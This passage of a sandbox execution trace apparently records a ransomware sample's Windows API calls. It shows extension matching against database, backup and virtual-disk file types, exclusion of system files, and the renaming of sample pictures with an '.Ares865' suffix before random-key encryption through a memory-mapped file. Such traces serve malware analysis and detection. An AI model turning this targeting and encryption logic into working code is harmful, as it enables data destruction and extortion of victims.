(lpString1="themum.jpg", lpString2="db-journal") returned 1 [0043.681] lstrlenW (lpString="db-shm") returned 6 [0043.681] lstrcmpiW (lpString1="um.jpg", lpString2="db-shm") returned 1 [0043.681] lstrlenW (lpString="db-wal") returned 6 [0043.681] lstrcmpiW (lpString1="um.jpg", lpString2="db-wal") returned 1 [0043.681] lstrlenW (lpString="dbc") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0043.681] lstrlenW (lpString="dbs") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0043.681] lstrlenW (lpString="dbt") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0043.681] lstrlenW (lpString="dbv") returned 3 [0043.681] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0043.682] lstrlenW (lpString="dbx") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0043.682] lstrlenW (lpString="dcb") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0043.682] lstrlenW (lpString="dct") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0043.682] lstrlenW (lpString="dcx") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0043.682] lstrlenW (lpString="ddl") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0043.682] lstrlenW (lpString="dlis") returned 4 [0043.682] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0043.682] lstrlenW (lpString="dp1") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0043.682] lstrlenW (lpString="dqy") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0043.682] lstrlenW (lpString="dsk") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0043.682] lstrlenW (lpString="dsn") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0043.682] lstrlenW (lpString="dtsx") returned 4 [0043.682] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0043.682] lstrlenW (lpString="dxl") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0043.682] lstrlenW (lpString="eco") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0043.682] lstrlenW (lpString="ecx") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0043.682] lstrlenW (lpString="edb") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0043.682] lstrlenW (lpString="epim") returned 4 [0043.682] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0043.682] lstrlenW (lpString="fcd") returned 3 [0043.682] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0043.682] lstrlenW (lpString="fdb") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0043.683] lstrlenW (lpString="fic") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0043.683] lstrlenW (lpString="flexolibrary") returned 12 [0043.683] lstrcmpiW (lpString1="anthemum.jpg", lpString2="flexolibrary") returned -1 [0043.683] lstrlenW (lpString="fm5") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0043.683] lstrlenW (lpString="fmp") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0043.683] lstrlenW (lpString="fmp12") returned 5 [0043.683] lstrcmpiW (lpString1="m.jpg", lpString2="fmp12") returned 1 [0043.683] lstrlenW (lpString="fmpsl") returned 5 [0043.683] lstrcmpiW (lpString1="m.jpg", lpString2="fmpsl") returned 1 [0043.683] lstrlenW (lpString="fol") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0043.683] lstrlenW (lpString="fp3") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0043.683] lstrlenW (lpString="fp4") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0043.683] lstrlenW (lpString="fp5") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0043.683] lstrlenW (lpString="fp7") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0043.683] lstrlenW (lpString="fpt") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0043.683] lstrlenW (lpString="frm") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0043.683] lstrlenW (lpString="gdb") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0043.683] lstrlenW (lpString="gdb") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0043.683] lstrlenW (lpString="grdb") returned 4 [0043.683] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0043.683] lstrlenW (lpString="gwi") returned 3 [0043.683] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0043.684] lstrlenW (lpString="hdb") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0043.684] lstrlenW (lpString="his") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0043.684] lstrlenW (lpString="ib") returned 2 [0043.684] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0043.684] lstrlenW (lpString="idb") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0043.684] lstrlenW (lpString="ihx") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0043.684] lstrlenW (lpString="itdb") returned 4 [0043.684] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0043.684] lstrlenW (lpString="itw") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0043.684] lstrlenW (lpString="jet") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0043.684] lstrlenW (lpString="jtx") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0043.684] lstrlenW (lpString="kdb") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0043.684] lstrlenW (lpString="kexi") returned 4 [0043.684] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0043.684] lstrlenW (lpString="kexic") returned 5 [0043.684] lstrcmpiW (lpString1="m.jpg", lpString2="kexic") returned 1 [0043.684] lstrlenW (lpString="kexis") returned 5 [0043.684] lstrcmpiW (lpString1="m.jpg", lpString2="kexis") returned 1 [0043.684] lstrlenW (lpString="lgc") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0043.684] lstrlenW (lpString="lwx") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0043.684] lstrlenW (lpString="maf") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0043.684] lstrlenW (lpString="maq") returned 3 [0043.684] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0043.684] lstrlenW (lpString="mar") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0043.685] lstrlenW (lpString="marshal") returned 7 [0043.685] lstrcmpiW (lpString1="mum.jpg", lpString2="marshal") returned 1 [0043.685] lstrlenW (lpString="mas") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0043.685] lstrlenW (lpString="mav") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0043.685] lstrlenW (lpString="maw") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0043.685] lstrlenW (lpString="mdbhtml") returned 7 [0043.685] lstrcmpiW (lpString1="mum.jpg", lpString2="mdbhtml") returned 1 [0043.685] lstrlenW (lpString="mdn") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0043.685] lstrlenW (lpString="mdt") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0043.685] lstrlenW (lpString="mfd") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0043.685] lstrlenW (lpString="mpd") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0043.685] lstrlenW (lpString="mrg") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0043.685] lstrlenW (lpString="mud") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0043.685] lstrlenW (lpString="mwb") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0043.685] lstrlenW (lpString="myd") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0043.685] lstrlenW (lpString="ndf") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0043.685] lstrlenW (lpString="nnt") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0043.685] lstrlenW (lpString="nrmlib") returned 6 [0043.685] lstrcmpiW (lpString1="um.jpg", lpString2="nrmlib") returned 1 [0043.685] lstrlenW (lpString="ns2") returned 3 [0043.685] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0043.685] lstrlenW (lpString="ns3") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0043.686] lstrlenW (lpString="ns4") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0043.686] lstrlenW (lpString="nsf") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0043.686] lstrlenW (lpString="nv") returned 2 [0043.686] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0043.686] lstrlenW (lpString="nv2") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0043.686] lstrlenW (lpString="nwdb") returned 4 [0043.686] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0043.686] lstrlenW (lpString="nyf") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0043.686] lstrlenW (lpString="odb") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0043.686] lstrlenW (lpString="odb") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0043.686] lstrlenW (lpString="oqy") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0043.686] lstrlenW (lpString="ora") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0043.686] lstrlenW (lpString="orx") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0043.686] lstrlenW (lpString="owc") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0043.686] lstrlenW (lpString="p96") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0043.686] lstrlenW (lpString="p97") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0043.686] lstrlenW (lpString="pan") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0043.686] lstrlenW (lpString="pdb") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0043.686] lstrlenW (lpString="pdm") returned 3 [0043.686] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0043.687] lstrlenW (lpString="pnz") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0043.687] lstrlenW (lpString="qry") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0043.687] lstrlenW (lpString="qvd") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0043.687] lstrlenW (lpString="rbf") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0043.687] lstrlenW (lpString="rctd") returned 4 [0043.687] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0043.687] lstrlenW (lpString="rod") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0043.687] lstrlenW (lpString="rodx") returned 4 [0043.687] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0043.687] lstrlenW (lpString="rpd") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0043.687] lstrlenW (lpString="rsd") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0043.687] lstrlenW (lpString="sas7bdat") returned 8 [0043.687] lstrcmpiW (lpString1="emum.jpg", lpString2="sas7bdat") returned -1 [0043.687] lstrlenW (lpString="sbf") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0043.687] lstrlenW (lpString="scx") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0043.687] lstrlenW (lpString="sdb") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0043.687] lstrlenW (lpString="sdc") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0043.687] lstrlenW (lpString="sdf") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0043.687] lstrlenW (lpString="sis") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0043.687] lstrlenW (lpString="spq") returned 3 [0043.687] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0043.687] lstrlenW (lpString="te") returned 2 [0043.688] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0043.688] lstrlenW (lpString="teacher") returned 7 [0043.688] lstrcmpiW (lpString1="mum.jpg", lpString2="teacher") returned -1 [0043.688] lstrlenW (lpString="tmd") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0043.688] lstrlenW (lpString="tps") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0043.688] lstrlenW (lpString="trc") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0043.688] lstrlenW (lpString="trc") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0043.688] lstrlenW (lpString="trm") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0043.688] lstrlenW (lpString="udb") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0043.688] lstrlenW (lpString="udl") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0043.688] lstrlenW (lpString="usr") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0043.688] lstrlenW (lpString="v12") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0043.688] lstrlenW (lpString="vis") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0043.688] lstrlenW (lpString="vpd") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0043.688] lstrlenW (lpString="vvv") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0043.688] lstrlenW (lpString="wdb") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0043.688] lstrlenW (lpString="wmdb") returned 4 [0043.688] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0043.688] lstrlenW (lpString="wrk") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0043.688] lstrlenW (lpString="xdb") returned 3 [0043.688] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0043.689] lstrlenW (lpString="xld") returned 3 [0043.689] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0043.689] lstrlenW (lpString="xmlff") returned 5 [0043.689] lstrcmpiW (lpString1="m.jpg", lpString2="xmlff") returned -1 [0043.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.Ares865") returned 66 [0043.689] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.ares865"), dwFlags=0x1) returned 1 [0043.832] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0043.832] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=879394) returned 1 [0043.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0043.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0043.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0043.832] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0043.833] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0043.833] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0043.833] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd6e30, lpName=0x0) returned 0x118 [0043.835] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd6e30) returned 0x1120000 [0044.011] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0044.011] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0044.011] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0044.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb440 [0044.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb440 | out: hHeap=0x2b0000) returned 1 [0044.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cbdb0 [0044.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0044.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0044.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0044.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0044.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0044.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0044.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0044.012] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0044.023] CloseHandle (hObject=0x118) returned 1 [0044.023] CloseHandle (hObject=0x120) returned 1 [0044.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0044.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0044.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0044.036] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="aoldtz.exe") returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2=".") returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="..") returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="windows") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="bootmgr") returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="temp") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="pagefile.sys") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="boot") returned 1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="ids.txt") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="ntuser.dat") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="perflogs") returned -1 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2="MSBuild") returned -1 [0044.037] lstrlenW (lpString="Desert.jpg") returned 10 [0044.037] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 58 [0044.037] lstrcpyW (in: lpString1=0x2cce452, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0044.037] lstrlenW (lpString="Desert.jpg") returned 10 [0044.037] lstrlenW (lpString="Ares865") returned 7 [0044.037] lstrcmpiW (lpString1="ert.jpg", lpString2="Ares865") returned 1 [0044.037] lstrlenW (lpString=".dll") returned 4 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2=".dll") returned 1 [0044.037] lstrlenW (lpString=".lnk") returned 4 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2=".lnk") returned 1 [0044.037] lstrlenW (lpString=".ini") returned 4 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2=".ini") returned 1 [0044.037] lstrlenW (lpString=".sys") returned 4 [0044.037] lstrcmpiW (lpString1="Desert.jpg", lpString2=".sys") returned 1 [0044.037] lstrlenW (lpString="Desert.jpg") returned 10 [0044.037] lstrlenW (lpString="bak") returned 3 [0044.037] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0044.037] lstrlenW (lpString="ba_") returned 3 [0044.037] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0044.037] lstrlenW (lpString="dbb") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0044.038] lstrlenW (lpString="vmdk") returned 4 [0044.038] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0044.038] lstrlenW (lpString="rar") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0044.038] lstrlenW (lpString="zip") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0044.038] lstrlenW (lpString="tgz") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0044.038] lstrlenW (lpString="vbox") returned 4 [0044.038] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0044.038] lstrlenW (lpString="vdi") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0044.038] lstrlenW (lpString="vhd") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0044.038] lstrlenW (lpString="vhdx") returned 4 [0044.038] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0044.038] lstrlenW (lpString="avhd") returned 4 [0044.038] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0044.038] lstrlenW (lpString="db") returned 2 [0044.038] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0044.038] lstrlenW (lpString="db2") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0044.038] lstrlenW (lpString="db3") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0044.038] lstrlenW (lpString="dbf") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0044.038] lstrlenW (lpString="mdf") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0044.038] lstrlenW (lpString="mdb") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0044.038] lstrlenW (lpString="sql") returned 3 [0044.038] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0044.038] lstrlenW (lpString="sqlite") returned 6 [0044.038] lstrcmpiW (lpString1="rt.jpg", lpString2="sqlite") returned -1 [0044.038] lstrlenW (lpString="sqlite3") returned 7 [0044.039] lstrcmpiW (lpString1="ert.jpg", lpString2="sqlite3") returned -1 [0044.039] lstrlenW (lpString="sqlitedb") returned 8 [0044.039] lstrcmpiW (lpString1="sert.jpg", lpString2="sqlitedb") returned -1 [0044.039] lstrlenW (lpString="xml") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0044.039] lstrlenW (lpString="$er") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0044.039] lstrlenW (lpString="4dd") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0044.039] lstrlenW (lpString="4dl") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0044.039] lstrlenW (lpString="^^^") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0044.039] lstrlenW (lpString="abs") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0044.039] lstrlenW (lpString="abx") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0044.039] lstrlenW (lpString="accdb") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accdb") returned 1 [0044.039] lstrlenW (lpString="accdc") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accdc") returned 1 [0044.039] lstrlenW (lpString="accde") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accde") returned 1 [0044.039] lstrlenW (lpString="accdr") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accdr") returned 1 [0044.039] lstrlenW (lpString="accdt") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accdt") returned 1 [0044.039] lstrlenW (lpString="accdw") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accdw") returned 1 [0044.039] lstrlenW (lpString="accft") returned 5 [0044.039] lstrcmpiW (lpString1="t.jpg", lpString2="accft") returned 1 [0044.039] lstrlenW (lpString="adb") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0044.039] lstrlenW (lpString="adb") returned 3 [0044.039] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0044.039] lstrlenW (lpString="ade") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0044.040] lstrlenW (lpString="adf") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0044.040] lstrlenW (lpString="adn") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0044.040] lstrlenW (lpString="adp") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0044.040] lstrlenW (lpString="alf") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0044.040] lstrlenW (lpString="ask") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0044.040] 